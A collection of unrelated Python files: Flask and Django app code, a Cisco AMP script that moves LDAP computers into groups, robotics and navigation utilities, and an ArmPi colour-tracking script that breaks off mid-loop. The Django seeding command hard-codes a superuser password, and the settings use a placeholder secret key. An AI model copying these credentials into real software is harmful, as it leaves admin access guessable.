response['tags'] = new_usertags
response['event'] = tiny_event
return jsonify(response), 201
except TypeError:
return jsonify(Error=str(result)), 400
def setRecommendation(self, uid, eid, recommendstatus):
"""Set an eventuserinteractions entry that states if the specified event has been recommended to the user or not.
Uses :func:`~app.DAOs.EventDAO.EventDAO.setRecommendation` as well as
:func:`~app.handlers.EventHandler._validate_uid_eid`
:param uid: User ID
:type uid: int
:param eid: Event ID.
:type eid: int
:param recommendstatus: qualitative result of recommendation calculation. Currently accepted recommendstatus: ["R", "N"]
:type recommendstatus: str
:returns JSON Response Object: JSON containing post response.
"""
try:
_validate_uid_eid(uid=uid, eid=eid)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
if not isinstance(recommendstatus, str) or recommendstatus not in RECOMMENDATION_TYPES:
return jsonify(Error='Invalid recommendstatus = ' + str(recommendstatus)), 400
uid_eid_pair = EventDAO().setRecommendation(uid=uid, eid=eid, recommendstatus=recommendstatus)
try:
return jsonify({"uid": uid_eid_pair[0],
"eid": uid_eid_pair[1]}), 201
except TypeError:
return jsonify(Error=str(uid_eid_pair)), 400
|
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from smtplib import SMTPException
from ldap3 import Server, Connection, core, SUBTREE
import configparser
import json
import os
import requests
import smtplib
import time
def send_report(recipient, sender_email, smtp_server):
    '''Send email with the created log files as attachments.

    Expects no authentication on the smtp server. Delivery is best-effort:
    SMTP failures are deliberately swallowed.

    :param recipient: destination address for the report.
    :param sender_email: address used in the From header.
    :param smtp_server: hostname of the (unauthenticated) SMTP relay.
    '''
    subject = 'CSE - Move to group by OU'
    body = 'Log files from script "cse_groupByOU.py"'
    # Create a multipart message and set headers
    message = MIMEMultipart()
    message["From"] = sender_email
    message["To"] = recipient
    message["Subject"] = subject
    # Add body to email
    message.attach(MIMEText(body, "plain"))
    files = ['move-log.txt']
    for a_file in files:
        # 'with' guarantees the handle is closed (the original leaked it).
        with open(a_file, 'rb') as attachment:
            part = MIMEBase('application', 'octet-stream')
            part.set_payload(attachment.read())
        part.add_header('Content-Disposition',
                        'attachment',
                        filename=a_file)
        encoders.encode_base64(part)
        message.attach(part)
    # Send the email; best-effort, so SMTP errors are ignored.
    try:
        smtpObj = smtplib.SMTP(smtp_server)
        smtpObj.sendmail(sender_email, recipient, message.as_string())
    except SMTPException:
        pass
def get_ldap_connection(ldap_server, ldap_port, ldap_ssl, ldap_user, ldap_password):
    '''Open a read-only LDAP connection; return 0 (and log) on failure.
    '''
    server = Server(ldap_server, port=int(ldap_port), use_ssl=ldap_ssl, get_info='ALL')
    try:
        return Connection(server, user=ldap_user, password=ldap_password,
                          fast_decoder=True, auto_bind=True, auto_referrals=True,
                          check_names=False, read_only=True,
                          lazy=False, raise_exceptions=False)
    except core.exceptions.LDAPExceptionError as e:
        # Start a fresh log file recording the failure; callers test for 0.
        with open('move-log.txt', 'w', encoding='utf-8') as file_output:
            file_output.write('LDAP exception: \n' + str(e) + '\n')
        return 0
def get_connectors_from_ou(ldap_connection, organizationalUnit):
    '''Grab computer names from OU with LDAP and return list
    '''
    # Paged search keeps memory bounded on large OUs; generator=False
    # materializes all pages into a single list of entries.
    entries = ldap_connection.extend.standard.paged_search(
        search_base=organizationalUnit,
        search_filter='(objectclass=computer)',
        search_scope=SUBTREE,
        attributes=['name'],
        paged_size=100,
        generator=False)
    # Only entries that carry a 'dn' are real search results.
    return [entry['attributes']['name'] for entry in entries if 'dn' in entry]
def get_connectors_from_cse(connectors_from_ou, groupGuid, computers_url, auth):
    '''Look each hostname up in the CSE API and return (hostname, guid) pairs
    for connectors that are not already in the target group.

    :param connectors_from_ou: hostnames returned by get_connectors_from_ou.
    :param groupGuid: GUID of the destination group.
    :param computers_url: base URL of the /computers/ API endpoint.
    :param auth: (client_id, api_key) tuple for API authentication.
    :returns: list of (hostname, connector_guid) tuples, or 0 on API error.
    '''
    connectors = []
    for connector in connectors_from_ou:
        # get_connectors_from_ou yields plain hostname strings; the original
        # indexed with [0], which on a string sent only the FIRST CHARACTER of
        # the hostname to the API. Tolerate sequence entries as well.
        hostname_query = connector if isinstance(connector, str) else connector[0]
        url = computers_url + f"?hostname={hostname_query}"
        try:
            r = requests.get(url, auth=auth)
            r.raise_for_status()
        except requests.exceptions.RequestException as e:
            with open('move-log.txt', 'a', encoding='utf-8') as file_output:
                file_output.write('Requests exception: \n' + str(e) + '\n')
            # Abort immediately: the original set connectors = 0 but kept
            # looping, so the next successful iteration crashed calling
            # .append on an int.
            return 0
        j = json.loads(r.content)
        for item in j["data"]:
            hostname = item.get('hostname')
            guid = item.get('connector_guid')
            group = item.get('group_guid')
            # Treat a missing group as "not in the target group" instead of
            # crashing on None.strip().
            if (group or '').strip() != groupGuid.strip():
                connectors.append((hostname, guid))
        # Adding a delay to prevent the API from being overwhelmed with requests
        time.sleep(1)
    return connectors
def move_to_group(connectors, groupGuid, computers_url, auth):
    '''Move connectors to group, appending one CSV result line per connector
    to move-log.txt.

    :param connectors: (hostname, guid) tuples from get_connectors_from_cse.
    :param groupGuid: GUID of the destination group.
    :param computers_url: base URL of the /computers/ API endpoint.
    :param auth: (client_id, api_key) tuple for API authentication.
    '''
    headers = {'Content-Type': "application/x-www-form-urlencoded", 'Accept': "application/json"}
    # Payload is invariant across the loop; build it once.
    payload = f"group_guid={groupGuid.strip()}"
    # Reuse one HTTP session for every PATCH (the original created a new
    # session per iteration, defeating connection pooling).
    APICall = requests.session()
    with open('move-log.txt', 'a', encoding='utf-8') as file_output:
        for connector in connectors:
            url = computers_url + f"{connector[1]}"
            try:
                r = APICall.patch(url, auth=auth, data=payload, headers=headers)
                r.raise_for_status()
            except requests.exceptions.RequestException as e:
                # Log through the already-open handle; the original re-opened
                # the same file for append while this handle was still open,
                # risking interleaved/buffered writes.
                file_output.write('Requests exception: \n' + str(e) + '\n')
            else:
                # The API answers 202 Accepted on a successful move request.
                status = 'Success' if r.status_code == 202 else 'Failure'
                file_output.write('{},{},{},{},{}\n'.format(connector[0],
                                                            connector[1],
                                                            groupGuid.strip(),
                                                            r.status_code,
                                                            status))
            # Adding a delay to prevent the API from being overwhelmed with requests
            time.sleep(1)
def main():
    '''The main logic of the script.

    Reads settings from cse_groupByOU.cfg, then for each "OU:groupGuid" line
    in groups_and_OUs.txt fetches computers from the OU via LDAP, looks them
    up in CSE, and moves any that are not already in the target group. Emails
    the log if anything beyond the header row was written, then deletes it.
    '''
    # Specify the config file
    config_file = 'cse_groupByOU.cfg'
    # Reading the config file to get settings
    config = configparser.RawConfigParser()
    config.read(config_file)
    client_id = config.get('CSE', 'client_id')
    api_key = config.get('CSE', 'api_key')
    cloud = config.get('CSE', 'cloud')
    recipient = config.get('EMAIL', 'recipient')
    sender_email = config.get('EMAIL', 'sender_email')
    smtp_server = config.get('EMAIL', 'smtp_server')
    ldap_server = config.get('LDAP', 'ldap_server')
    ldap_port = config.get('LDAP', 'ldap_port')
    ldap_ssl = config.get('LDAP', 'ldap_ssl')
    ldap_user = config.get('LDAP', 'ldap_user')
    ldap_password = config.get('LDAP', 'ldap_password')
    # Set auth
    auth = (client_id, api_key)
    # URL to query AMP; empty cloud means the default (NAM) endpoint.
    if cloud == '':
        computers_url = 'https://api.amp.cisco.com/v1/computers/'
    else:
        computers_url = 'https://api.' + cloud + '.amp.cisco.com/v1/computers/'
    # Create log file and write headers. The 'with' block closes the handle;
    # the original also called file_output.close() redundantly inside it.
    with open('move-log.txt', 'w', encoding='utf-8') as file_output:
        file_output.write('Hostname,GUID,Group Guid,Status code,Status\n')
    # Open file with OU and Group guid and call on functions to move computers for each line
    with open('groups_and_OUs.txt', 'r') as f:
        for line in f:
            # Skip blank lines instead of crashing on the unpack below.
            if not line.strip():
                continue
            # maxsplit=1 keeps the group GUID intact even if it contains ':'.
            organizationalUnit, groupGuid = line.split(':', 1)
            ldap_connection = get_ldap_connection(ldap_server, ldap_port, ldap_ssl, ldap_user, ldap_password)
            # If no ldap connection, do not go further
            if ldap_connection != 0:
                connectors_from_ou = get_connectors_from_ou(ldap_connection, organizationalUnit)
                if connectors_from_ou != 0:
                    connectors = get_connectors_from_cse(connectors_from_ou, groupGuid, computers_url, auth)
                    if connectors != 0:
                        move_to_group(connectors, groupGuid, computers_url, auth)
    # Check whether more than one line have been written to log file. If not, don't send email
    with open(r"move-log.txt", 'r') as fp:
        x = len(fp.readlines())
    if x > 1:
        send_report(recipient, sender_email, smtp_server)
    # Cleanup
    os.remove('move-log.txt')
# Cleanup
os.remove('move-log.txt')
# Standard script entry point: run main() only when executed directly,
# not when imported as a module.
if __name__ == "__main__":
    main()
|
from django.urls import path
from snippets import views
# URL routes for the snippets app. The first pair uses view callables
# directly; the remaining routes use class-based views via .as_view().
urlpatterns = [
    path('snippets/', views.snippet_list),
    path('snippets/<int:pk>/', views.snippet_detail),
    path('snippetz/', views.SnippetList.as_view()),
    path('snippetz/<int:pk>/', views.SnippetDetail.as_view()),
    path('snippetzz/', views.SnippetListz.as_view()),
    path('snippetzz/<int:pk>/', views.SnippetDetailz.as_view()),
    # NOTE(review): the 'snippetx' routes point at the same views as
    # 'snippetzz' — presumably deliberate aliases; confirm or drop one pair.
    path('snippetx/', views.SnippetListz.as_view()),
    path('snippetx/<int:pk>/', views.SnippetDetailz.as_view()),
    path('users/', views.UserList.as_view()),
    path('users/<int:pk>/', views.UserDetail.as_view()),
]
|
from dataclasses import dataclass
from pathlib import Path
from typing import Any, Dict
from utils.files import PickleFile, TarFile
from utils.logger import logger
@dataclass
class ExperimentArtifacts:
    """Collects experiment outputs (metrics, packaged models) for a run.

    Per-model artifacts live under ``base_path / model_name``; the combined
    model tarball lives directly under ``base_path``.
    """
    run_tag: str
    model_name: str
    base_path: Path

    def _create_if_not_exist(self) -> None:
        """Ensure the per-model output directory exists."""
        Path(self.output_prefix).mkdir(parents=True, exist_ok=True)

    @property
    def output_prefix(self) -> Path:
        """Directory that holds this model's artifacts."""
        return self.base_path / self.model_name

    def generate_artifacts(self, metrics: Dict[str, Any]) -> None:
        """Record the metrics mapping (persisted later by save_results) and log it.

        :param metrics: metric name -> value mapping.
        """
        # The original also built a list of metric names that was never used;
        # that dead code has been removed.
        self.metrics = metrics
        logger.info(metrics)

    def save_results(self) -> None:
        """Pickle the recorded metrics to <output_prefix>/metrics.pkl."""
        self._create_if_not_exist()
        metrics_path = str(self.output_prefix / 'metrics.pkl')
        PickleFile.write(metrics_path, self.metrics)

    def save(self) -> None:
        """Persist all artifacts (currently just the metrics)."""
        self.save_results()

    # Create single output for Sagemaker training-job
    @property
    def model_package_path(self) -> Path:
        """Path of the combined model tarball."""
        return self.base_path / 'model.tar.gz'

    def create_package_with_models(self) -> None:
        """Bundle every '*joblib' file under base_path into model.tar.gz,
        storing each file as '<parent_dir>/<name>' inside the archive.
        """
        logger.info(f"Loading models from {self.base_path}")
        model_paths = {}
        for p in sorted(self.base_path.glob("**/*joblib")):
            model_paths[str(p)] = f"{p.parent.name}/{p.name}"
        TarFile.compress(self.model_package_path, model_paths)
|
# Production overrides layered on top of the shared base settings module.
from settings import *
DEBUG = False
SITE_ROOT = ''
LOGIN_URL = SITE_ROOT + "/accounts/login/"
# Theme info
# LOCAL_STATICFILE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__),
# '../../ODC-overlay/static'))
# LOCAL_TEMPLATE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__),
# '../../ODC-overlay/templates'))
# ReCatchpa stuff
RECAPTCHA_PUBLIC_KEY = '6LfU8t8SAAAAAJKrpalcrjlSA6zf9SIJaMBbz33s'
# NOTE(review): private key left empty — must be filled in per deployment.
RECAPTCHA_PRIVATE_KEY = ''
# Twitter stuff
TWITTER_USER = None
# AWS Credentials for Warehouse stuff
AWS_ACCESS_KEY = None
AWS_SECRET_KEY = None
# Contacts
# mx_host = 'mycity.gov'
ADMINS = (
    ('Colin', 'copelco@caktusgroup.com'),
)
CONTACT_EMAILS = ['copelco@caktusgroup.com']
DEFAULT_FROM_EMAIL = 'OpenData Site <noreply@example.com>'
EMAIL_SUBJECT_PREFIX = '[OpenDataCatalog - MYCITY] '
SERVER_EMAIL = 'OpenData Team <info@example.com>'
MANAGERS = (
    ('Colin', 'copelco@caktusgroup.com'),
)
# Database credentials are intentionally blank; supply them per deployment.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
        'NAME': 'opendata', # Or path to database file if using sqlite3.
        'USER': '', # Not used with sqlite3.
        'PASSWORD': '', # Not used with sqlite3.
        'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
        'PORT': '', # Set to empty string for default. Not used with sqlite3.
    }
}
INSTALLED_APPS += (
    'gunicorn',
)
# Make this unique, and don't share it with anybody.
# NOTE(review): 'insecure' is a placeholder — override with a real secret in
# any real deployment.
SECRET_KEY = 'insecure'
|
from decouple import config
from django.contrib.sites.models import Site
from django.core.management import BaseCommand
from accounts.models.system_user import SystemUser
class Command(BaseCommand):
    """Seed the database with site info and a default super user."""

    def handle(self, *args, **options):
        self.generate_site_info()
        self.stdout.write(self.style.SUCCESS('Site info generated successfully.'))
        # Generate role, permissions for super organization
        self.generate_super_user()
        self.stdout.write(self.style.SUCCESS('Super user generated successfully.'))

    def generate_super_user(self):
        """
        Create the default super user if it does not exist yet.

        :return: the existing or newly created SystemUser
        """
        # BUG FIX: the lookup previously filtered on username='shafikshaon'
        # while the user is created with username='shafikshaon@gmail.com',
        # so the filter never matched and every run attempted to create the
        # user again. Look up by the username that is actually stored.
        super_user = SystemUser.objects.filter(username='shafikshaon@gmail.com').first()
        if super_user is None:
            super_user = SystemUser.objects.create(
                first_name='Shafikur',
                last_name='Rahman',
                username='shafikshaon@gmail.com',
                email='shafikshaon@gmail.com',
                is_superuser=True,
                is_active=True,
                is_organization_admin=True,
                is_staff=True,
                code='U-00001'
            )
            # NOTE(review): hard-coded bootstrap password — change after
            # first login, or source it from configuration.
            super_user.set_password('p@ss1234')
            super_user.save()
        return super_user

    def generate_site_info(self):
        """Point the default django.contrib.sites record at the configured domain."""
        site = Site.objects.first()
        site.domain = config('DOMAIN')
        site.name = config('SITE_NAME')
        site.save()
|
from .system_user import *
|
# test 1
# import a module we wrote ourselves
import pizza

pizza.make_pizza(16, 'pepperoni')
pizza.make_pizza(12, 'mushrooms', 'green peppers', 'extra cheese')

# test 2
# import a specific function from the module
from pizza import make_pizza

make_pizza(17, 'hello')

# test 3
# import a module under an alias
import pizza as p

p.make_pizza(18, "as")

# test 4
# import every function from the module
from pizza import *

# Translation of the style notes below: give functions descriptive names
# using only lowercase letters and underscores; every function should carry
# a short docstring immediately after its def line; no spaces around '=' when
# giving a parameter a default value; all imports belong at the top of the
# file, the only exception being a leading comment describing the program.
'''
应给函数指定描述性名称,且只在其中使用小写字母和下划线
每个函数都应包含简要地阐述其功能的注释,该注释应紧跟在函数定义后面,并采用文档字符串格式
给形参指定默认值时,等号两边不要有空格
所有的 import 语句都应放在文件开头,唯一例外的情形是,在文件开头使用了注释来描述整个程序
'''
# Read two integers and report how the first compares to the second.
first_number = int(input('Enter first number: '))
second_number = int(input('Enter second number: '))

if first_number == second_number:
    print('equal')
elif first_number > second_number:
    print('larger')
else:
    print('smaller')
|
import logging
import copy
import time
from spockbot.mcdata import blocks
from spockbot.plugins.base import PluginBase, pl_announce
from spockbot.plugins.tools.event import EVENT_UNREGISTER
from spockbot.vector import Vector3
from utils.constants import *
import utils.movement_utils as mov
import utils.camera_utils as cam
__author__ = 'Bradley Sheneman'
logger = logging.getLogger('spockbot')
@pl_announce('VisualSensor')
class VisualSensorPlugin(PluginBase):
    """Samples the world around the client on each vision tick and emits an
    'agent_visual_percept' event with visible blocks in agent-relative
    coordinates."""

    requires = ('Event', 'Timers', 'ClientInfo', 'World')
    events = {
        'client_join_game': 'handle_client_join',
        'sensor_tick_vision': 'handle_camera_tick',
    }

    def __init__(self, ploader, settings):
        super(VisualSensorPlugin, self).__init__(ploader, settings)
        # not sure if this actually initializes the dict ahead of time...
        cam.init_block_mats()

    def handle_camera_tick(self, name, data):
        """Build the visible-block percept for this tick and emit it."""
        start = time.time()
        blocks_percept = self.get_visible_blocks(data)
        relative_percept = self.percept_to_relative(blocks_percept)
        end = time.time()
        print("total ms for camera tick: {}".format(1000*(end-start)))
        logger.info("visual percept: {}".format(blocks_percept))
        logger.info("relative visual percept: {}".format(relative_percept))
        self.event.emit('agent_visual_percept', relative_percept)

    def handle_client_join(self, name, data):
        # nothing to do on join yet; event kept registered for future use
        pass

    def get_visible_blocks(self, data):
        """Return the blocks in the FOV cone that are actually visible."""
        # all block coordinates in the FOV cone (ignoring visibility)
        coords = cam.get_coordinates_in_range(data)
        # the actual block types given the world, at those locations
        block_data = self.get_block_multi(coords)
        vis_blocks = cam.get_visible_blocks(block_data)
        #mov.log_agent_vision(vis_blocks)
        return vis_blocks

    def get_block_multi(self, coords):
        """Look up (id, meta) for each {'x','y','z'} dict in `coords`.

        BUG FIX: the original assigned `data = copy.copy(pos)` and then
        immediately overwrote it with an empty dict — the copy was dead code
        and has been removed. The local was also renamed so it no longer
        shadows the imported `blocks` module.
        """
        block_data = []
        for pos in coords:
            entry = dict()
            entry['coords'] = (pos['x'], pos['y'], pos['z'])
            entry['id'], entry['meta'] = self.world.get_block(*entry['coords'])
            block_data.append(entry)
        return block_data

    def percept_to_relative(self, percept):
        """Translate absolute block coords to offsets from the agent."""
        pos = self.clientinfo.position
        pos_coords = mov.get_nearest_position(pos.x, pos.y, pos.z)
        rel_percept = dict()
        for xyz in percept:
            rel_coords = tuple([p1-p0 for p0, p1 in zip(pos_coords, xyz)])
            rel_percept[rel_coords] = percept[xyz]
        return rel_percept
|
class CommentDemo:
    """
    Comment demo: shows where comments belong when defining classes,
    methods and variables.
    """

    # class-level variable definition
    list1 = ['test', 12, 45]
    """
    定义变量
    """

    def test(self, x, y):
        """
        Method definition (no-op placeholder).
        """
        pass
|
# Generated by Django 2.1.3 on 2018-11-06 12:41
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make receiver.receiver_dev_id a unique 16-char identifier."""

    dependencies = [
        ('core', '0028_auto_20181107_0141'),
    ]

    operations = [
        migrations.AlterField(
            model_name='receiver',
            name='receiver_dev_id',
            field=models.CharField(default='', max_length=16, unique=True),
        ),
    ]
|
from sqlalchemy.types import TypeDecorator, CHAR
from sqlalchemy.dialects.postgresql import UUID
import uuid
class GUID(TypeDecorator):
    """Platform-independent GUID type.

    Uses PostgreSQL's UUID type, otherwise uses
    CHAR(32), storing as stringified hex values.

    NOTE(review): on SQLAlchemy 1.4+ custom TypeDecorators should declare
    ``cache_ok = True`` when safe — confirm the project's SQLAlchemy version.
    """

    impl = CHAR

    def load_dialect_impl(self, dialect):
        """Use the native UUID column on PostgreSQL, CHAR(32) elsewhere."""
        if dialect.name == 'postgresql':
            return dialect.type_descriptor(UUID())
        else:
            return dialect.type_descriptor(CHAR(32))

    def process_bind_param(self, value, dialect):
        """Convert a Python value to the column representation on write."""
        if value is None:
            return value
        elif dialect.name == 'postgresql':
            return str(value)
        else:
            if not isinstance(value, uuid.UUID):
                # accept anything uuid.UUID() can parse (e.g. a hex string)
                return "%.32x" % uuid.UUID(value).int
            else:
                # hexstring
                return "%.32x" % value.int

    def process_result_value(self, value, dialect):
        """Convert a stored value back into a uuid.UUID on read."""
        if value is None:
            return value
        else:
            if not isinstance(value, uuid.UUID):
                value = uuid.UUID(value)
            return value
|
# Generated by Django 2.1.3 on 2018-11-07 08:09
from django.db import migrations, models
class Migration(migrations.Migration):
    """Allow location.comment to be blank/null (max 128 chars)."""

    dependencies = [
        ('core', '0039_auto_20181107_2107'),
    ]

    operations = [
        migrations.AlterField(
            model_name='location',
            name='comment',
            field=models.CharField(blank=True, max_length=128, null=True),
        ),
    ]
|
# Map from (dx, dy) unit offsets to compass names ("C" = centre / no move).
coord_to_dir = {
    (0, 0): "C",
    (0, 1): "S",
    (1, 1): "SE",
    (1, 0): "E",
    (1, -1): "NE",
    (0, -1): "N",
    (-1, -1): "NW",
    (-1, 0): "W",
    (-1, 1): "SW",
}

# Inverse mapping, derived from the table above so the two can never drift.
dir_to_coord = {name: offset for offset, name in coord_to_dir.items()}
def calculate_dir(start, target):
    """
    Calculate the direction in which to go to get from start to target.

    start: a tuple representing an (x, y) point
    target: a tuple representing an (x, y) point
    Returns a coordinate direction (dx, dy) with each component in {-1, 0, 1}.

    (FIX: the old docstring documented an `as_coord` parameter that never
    existed — this function always returns a coordinate; use coord_to_dir
    to get a compass name.)
    """
    # sign of the delta, computed branch-free: (x > 0) - (x < 0)
    dx = (target[0] > start[0]) - (target[0] < start[0])
    dy = (target[1] > start[1]) - (target[1] < start[1])
    return (dx, dy)
# The 8 unit directions in clockwise order starting at "S"; `rotate` indexes
# into this ring modulo 8.
rotate_arr = [
    (0, 1),
    (1, 1),
    (1, 0),
    (1, -1),
    (0, -1),
    (-1, -1),
    (-1, 0),
    (-1, 1)
]
def get_list_index(lst, tup):
    """Return the index of the first 2-tuple in lst equal to tup, else None."""
    # only works for 2-tuples
    for idx, pair in enumerate(lst):
        if pair[0] == tup[0] and pair[1] == tup[1]:
            return idx
    return None
def rotate(orig_dir, amount):
    """Rotate a unit direction by `amount` 45-degree steps around the ring."""
    start = get_list_index(rotate_arr, orig_dir)
    return rotate_arr[(start + amount) % 8]
def reflect(full_map, loc, horizontal=True):
    """Mirror `loc` across the map's horizontal or vertical axis, falling back
    to the other axis when the preferred mirrored cell is not passable.

    NOTE(review): the reflection uses `len(...) - loc`, not `len(...) - 1 - loc`;
    for a width-W map that maps x=0 to x=W (out of range) — possible
    off-by-one, confirm against the map convention used by callers.
    """
    v_reflec = (len(full_map[0]) - loc[0], loc[1])
    h_reflec = (loc[0], len(full_map) - loc[1])
    if horizontal:
        # prefer the horizontal mirror; use the vertical one if it is blocked
        return h_reflec if full_map[h_reflec[1]][h_reflec[0]] else v_reflec
    else:
        return v_reflec if full_map[v_reflec[1]][v_reflec[0]] else h_reflec
def is_passable(full_map, loc, coord_dir, robot_map=None):
    """Return True if stepping from `loc` by `coord_dir` lands on a free cell.

    full_map is indexed as full_map[y][x] (row-major); a falsy cell is
    impassable. If `robot_map` is given, cells with a value > 0 are occupied.

    BUG FIX: the x bound was previously checked against len(full_map) (the
    row count) instead of the row width, which broke non-square maps.
    """
    new_point = (loc[0] + coord_dir[0], loc[1] + coord_dir[1])
    # x is a column index: bound it by the row width, not the row count
    if new_point[0] < 0 or new_point[0] >= len(full_map[0]):
        return False
    if new_point[1] < 0 or new_point[1] >= len(full_map):
        return False
    if not full_map[new_point[1]][new_point[0]]:
        return False
    if robot_map is not None and robot_map[new_point[1]][new_point[0]] > 0:
        return False
    return True
def apply_dir(loc, dir):
    """Return the point reached by taking one step `dir` from `loc`."""
    x, y = loc
    dx, dy = dir
    return (x + dx, y + dy)
def goto(loc, target, full_map, robot_map, already_been):
    """Choose a unit direction that moves from `loc` toward `target`,
    sidestepping blocked cells by rotating away from the goal direction.

    BUG FIX: the original compared tuples with `is` (`goal_dir is (0, 0)`),
    which tests identity, not equality — it is never reliably true for a
    tuple built at runtime, so the early return never fired. Use `==`.
    """
    goal_dir = calculate_dir(loc, target)
    if goal_dir == (0, 0):
        return (0, 0)
    # self.log("MOVING FROM " + str(my_coord) + " TO " + str(nav.dir_to_coord[goal_dir]))
    end_dir = goal_dir
    i = 0
    # Alternate checking either side of the goal dir, by increasing amounts
    # (but not past directly backwards).
    while not is_passable(full_map, loc, end_dir, robot_map) and i < 4:  # or apply_dir(loc, goal_dir) in already_been: # doesn't work because `in` doesn't work :(
        if i > 0:
            i = -i
        else:
            i = -i + 1
        end_dir = rotate(goal_dir, i)
    return end_dir
|
#!/usr/bin/python3
# coding=utf8
import sys
sys.path.append('/home/pi/ArmPi/')
import cv2
import time
import Camera
import threading
from LABConfig import *
from ArmIK.Transform import *
from ArmIK.ArmMoveIK import *
import HiwonderSDK.Board as Board
from CameraCalibration.CalibrationConfig import *
# This script requires python3 (the ArmPi SDK is python3-only); refuse py2.
if sys.version_info.major == 2:
    print('Please run this program with python3!')
    sys.exit(0)

# Inverse-kinematics solver for the arm.
AK = ArmIK()

# Drawing colours in BGR order (OpenCV convention) for annotating frames.
range_rgb = {
    'red': (0, 0, 255),
    'blue': (255, 0, 0),
    'green': (0, 255, 0),
    'black': (0, 0, 0),
    'white': (255, 255, 255),
}
# Colour(s) the tracker is currently looking for.
__target_color = ('red',)


def setTargetColor(target_color):
    """Replace the set of colours to detect; returns (True, ()) as an ack."""
    global __target_color
    __target_color = target_color
    return (True, ())
# find outline of largest area
# contour list, each contour is checked and largest area selected
def getAreaMaxContour(contours):
    """Return (largest_contour, largest_area).

    The contour itself is only returned when its area exceeds 300, which
    filters out small noise detections; the area is returned regardless.
    """
    best_area = 0
    best_contour = None
    for contour in contours:
        area = math.fabs(cv2.contourArea(contour))
        if area > best_area:
            best_area = area
            # areas of 300 or less are treated as interference
            if area > 300:
                best_contour = contour
    return best_contour, best_area
# angle at which the gripper is closed when clamped
servo1 = 500

# initial position of arm
def initMove():
    """Park the arm: gripper almost closed, wrist centred, arm at rest pose."""
    Board.setBusServoPulse(1, servo1 - 50, 300)
    Board.setBusServoPulse(2, 500, 500)
    AK.setPitchRangeMoving((0, 10, 10), -30, -30, -90, 1500)
def setBuzzer(timer):
    """Sound the buzzer for `timer` seconds, then silence it."""
    Board.setBuzzer(0)
    Board.setBuzzer(1)
    time.sleep(timer)
    Board.setBuzzer(0)
#set RGB light color of the arm to match the color you track
def set_rgb(color):
    """Light both arm LEDs in the named colour; unknown names switch them off."""
    led_rgb = {
        "red": (255, 0, 0),
        "green": (0, 255, 0),
        "blue": (0, 0, 255),
    }
    r, g, b = led_rgb.get(color, (0, 0, 0))
    Board.RGB.setPixelColor(0, Board.PixelColor(r, g, b))
    Board.RGB.setPixelColor(1, Board.PixelColor(r, g, b))
    Board.RGB.show()
# --- shared tracker state (mutated by both the camera and the move thread) ---
count = 0              # consecutive frames the object has stayed still
track = False          # True while following the object with the arm
_stop = False          # request flag: move thread should park the arm
get_roi = False        # True once a region of interest has been locked
center_list = []       # recent (x, y) world coordinates of the object
first_move = True      # True until the first approach move has been made
__isRunning = False    # master on/off switch for the tracking loop
detect_color = 'None'  # colour currently being tracked ('None' when idle)
action_finish = True   # False while the pick-and-place sequence is running
start_pick_up = False  # set by run() when the object has settled
start_count_t1 = True  # True when the stillness timer should restart
# variable reset
def reset():
    """Restore every piece of shared tracker state to its startup value."""
    global count
    global track
    global _stop
    global get_roi
    global first_move
    global center_list
    global __isRunning
    global detect_color
    global action_finish
    global start_pick_up
    global __target_color
    global start_count_t1

    count = 0
    _stop = False
    track = False
    get_roi = False
    center_list = []
    first_move = True
    __target_color = ()
    detect_color = 'None'
    action_finish = True
    start_pick_up = False
    start_count_t1 = True
# initializes arm
def init():
    """Move the arm to its parked pose; called once before start()."""
    print("ColorTracking Init")
    initMove()
# reset arm
def start():
    """Reset shared state and enable the tracking loop."""
    global __isRunning
    reset()
    __isRunning = True
    print("ColorTracking Start")
# stops arm
def stop():
    """Disable the tracking loop and ask the move thread to park the arm."""
    global _stop
    global __isRunning
    _stop = True
    __isRunning = False
    print("ColorTracking Stop")
# exits arm
def exit():
    """Same as stop(); kept as a separate RPC entry point.

    NOTE(review): this shadows the builtin exit within this module.
    """
    global _stop
    global __isRunning
    _stop = True
    __isRunning = False
    print("ColorTracking Exit")
# --- geometry state shared with the camera thread ---
rect = None              # cv2.minAreaRect of the detected object
size = (640, 480)        # working resolution used for detection
rotation_angle = 0       # rect angle used to orient the gripper
unreachable = False      # True when the last IK solve failed
world_X, world_Y = 0, 0  # averaged pick-up target (world coordinates)
world_x, world_y = 0, 0  # latest per-frame object position (world coords)
# arm movement thread
def move():
    """Worker loop: approach the tracked object, grip it, and place it on the
    mat position assigned to its colour, then return to the park pose.

    Runs forever as a daemon thread; cooperates with run() purely through the
    module-level globals. The `if not __isRunning: continue` guards abort the
    pick-and-place sequence as soon as stop()/exit() is called.
    """
    global rect
    global track
    global _stop
    global get_roi
    global unreachable
    global __isRunning
    global detect_color
    global action_finish
    global rotation_angle
    global world_X, world_Y
    global world_x, world_y
    global center_list, count
    global start_pick_up, first_move

    # matt placement coordinates for colors
    coordinate = {
        'red': (-15 + 0.5, 12 - 0.5, 1.5),
        'green': (-15 + 0.5, 6 - 0.5, 1.5),
        'blue': (-15 + 0.5, 0 - 0.5, 1.5),
    }
    while True:
        if __isRunning:
            if first_move and start_pick_up:  # when object is first detected
                action_finish = False
                set_rgb(detect_color)
                setBuzzer(0.1)
                # do not fill in the run time parameter: adaptive run time
                result = AK.setPitchRangeMoving((world_X, world_Y - 2, 5), -90, -90, 0)
                if result == False:
                    unreachable = True
                else:
                    unreachable = False
                    time.sleep(result[2]/1000)  # third item of the result is the move time (ms)
                start_pick_up = False
                first_move = False
                action_finish = True
            elif not first_move and not unreachable:  # not the first detection
                set_rgb(detect_color)
                if track:  # if in tracking phase
                    if not __isRunning:  # stop and exit flag bit detection
                        continue
                    AK.setPitchRangeMoving((world_x, world_y - 2, 5), -90, -90, 0, 20)
                    time.sleep(0.02)
                    track = False
                if start_pick_up:  # object has not moved for a while: clamp it
                    action_finish = False
                    if not __isRunning:  # stop and exit flag bit detection
                        continue
                    Board.setBusServoPulse(1, servo1 - 280, 500)  # set claws open
                    # calculate angle at which gripper needs to rotate
                    servo2_angle = getAngle(world_X, world_Y, rotation_angle)
                    Board.setBusServoPulse(2, servo2_angle, 500)
                    time.sleep(0.8)
                    if not __isRunning:
                        continue
